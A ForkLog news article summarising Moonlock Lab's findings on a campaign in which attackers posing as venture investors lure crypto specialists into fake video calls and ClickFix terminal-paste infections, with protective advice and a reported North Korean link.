Hackers attacked crypto specialists disguised as venture investors - ForkLog: cryptocurrencies, AI, singularity, the future

# Hackers Attack Crypto Experts Pretending to Be Venture Investors

Moonlock Lab analysts uncovered a large-scale attack on Web3 developers and crypto specialists. Hackers are disguising themselves as venture investors and finding victims on LinkedIn.

Malicious actors praise the projects of specialists and offer collaboration. They then send links to fake video conferences that infect computers with viruses.

Illusion of Legitimate Business

The attackers created three fake crypto funds: SolidBit Capital, MegaBit, and Lumax Capital. The organization websites look credible. They list corporate history, investment portfolios, and management teams. The images of staff members’ faces were generated by neural networks.

Source: Moonlock Lab. The scammers contact specialists from fake accounts. They pose as top managers of these funds. The conversation begins with compliments on the victim’s professional achievements.

Infection via ClickFix

The malicious actors quickly shift the conversation to messaging apps and invite victims to a video call. The victim receives a link to a Calendly service. The link redirects the user to an exact copy of the Zoom, Google Meet, or other similar service website.

A Cloudflare verification window pops up on the screen. The system asks the user to check a box and confirm they are not a robot. This is a hacker technique called ClickFix.

Clicking the button secretly copies malicious code to the clipboard. The site displays an animated instruction with a timer. The user is asked to open the system terminal, paste the copied text, and press Enter.

The code automatically detects the operating system:

• On Windows — a hidden process runs directly in RAM. The virus does not save files to the hard drive, allowing it to bypass security systems;
• On macOS — the script checks for Python, discreetly downloads necessary libraries, and embeds itself into the system.

Source: Moonlock Lab. In some cases, hackers sent victims an app that fully copies the interface of the real Zoom on Mac. The program mimics the login window, collects passwords, and sends them to the scammers’ Telegram bot.

Connection to North Korean Hackers

The addresses of the fake websites are registered under the name of Anatoly Bigdash from Boston, USA. Experts doubt the existence of this person.

Source: Moonlock Lab. Researchers noticed a similarity in tactics with the methods of group UNC1069. This team has been hacking crypto projects since 2018. Mandiant analysts previously linked it to North Korea. The criminals use identical malicious link structures and similar scam scenarios involving fake video calls.

To protect against these attacks, specialists recommend checking the registration dates of the interlocutors’ domains. Legitimate services never ask users to enter commands in the terminal to verify identity or start a broadcast. You can spot the scam at the stage of clicking external links.

Recall that in June 2025, investment partner of the venture firm Hypersphere, Mehdi Faruk, was a victim of a phishing attack via a fake Zoom call.